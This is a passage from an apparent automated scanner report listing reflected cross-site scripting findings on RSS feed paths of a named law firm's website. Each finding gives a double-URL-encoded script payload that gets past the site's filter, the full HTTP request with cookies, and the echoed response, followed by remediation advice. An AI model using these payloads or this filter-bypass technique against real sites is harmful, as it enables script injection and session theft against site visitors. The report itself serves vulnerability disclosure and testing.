This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events/rss.xml5ac25"><script>alert(1)</script>a7c854d93a" value="">
...[SNIP]...

2.124. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsscefc3"><script>alert(1)</script>b60ad84eb9c/in_the_news/rss.xml" value="">
...[SNIP]...

2.125. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_newscc00e"><script>alert(1)</script>d760b3b5dd4/rss.xml" value="">
...[SNIP]...

2.126. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_news/rss.xmlb6f54"><script>alert(1)</script>2151516518f" value="">
...[SNIP]...

2.127. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss9abb7"><script>alert(1)</script>3d2f01cf3f9/news_releases/rss.xml" value="">
...[SNIP]...

2.128. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releasesdc1d0"><script>alert(1)</script>98c2f7af3b5/rss.xml" value="">
...[SNIP]...

2.129. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releases/rss.xmlee81a"><script>alert(1)</script>d27cf73a803" value="">
...[SNIP]...

2.130. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss32ca8"><script>alert(1)</script>73f8dfaacf9/practices/Advertising/rss.xml" value="">
...[SNIP]...

2.131. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices5de32"><script>alert(1)</script>bc55ccc6862/Advertising/rss.xml" value="">
...[SNIP]...

2.132. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising80e2b"><script>alert(1)</script>09ca10697f5/rss.xml" value="">
...[SNIP]...

2.133. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising/rss.xml86ab1"><script>alert(1)</script>6017d2c2dff" value="">
...[SNIP]...

2.134. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0 was submitted in the REST URL parameter 1. This input was echoed as 164d9"><script>alert(1)</script>7c58cabc2d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0/practices/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss164d9"><script>alert(1)</script>7c58cabc2d0/practices/Antitrust/rss.xml" value="">
...[SNIP]...

2.135. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b was submitted in the REST URL parameter 2. This input was echoed as 9acfd"><script>alert(1)</script>287c030088b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices9acfd"><script>alert(1)</script>287c030088b/Antitrust/rss.xml" value="">
...[SNIP]...

2.136. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af was submitted in the REST URL parameter 3. This input was echoed as bd079"><script>alert(1)</script>bf831efe7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Antitrustbd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Antitrustbd079"><script>alert(1)</script>bf831efe7af/rss.xml" value="">
...[SNIP]...

2.137. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb was submitted in the REST URL parameter 4. This input was echoed as 10885"><script>alert(1)</script>9f493b0ddcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Antitrust/rss.xml10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
